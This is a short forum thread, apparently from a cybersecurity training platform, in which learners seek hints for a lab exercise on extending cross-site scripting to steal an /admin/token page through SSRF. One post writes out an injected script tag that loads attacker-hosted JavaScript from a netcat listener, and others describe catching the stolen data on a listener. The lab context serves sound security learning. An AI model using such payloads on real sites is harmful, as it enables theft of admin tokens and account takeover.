Forum Discussion
shubham
Bronze I
10 months ago
Cross-Site Scripting: Ep.6 – Further Exploitation
I was stuck on one question and am looking for a hint. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.
johndoe321
9 months ago
I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Rolled right in.
natelott
Bronze I
10 months ago
Having the same issues. Script is running, but /admin/token immediately redirects back to /dashboard. Executed JS code in console and it returns HTML from /dashboard.
Created script.js on VM. Running netcat instance on port 8080 to handle HTTP request. I can see the request occur in terminal. Token not returned.
Command being used in message field: <script src="http://0.0.0.0:8080/script.js"></script>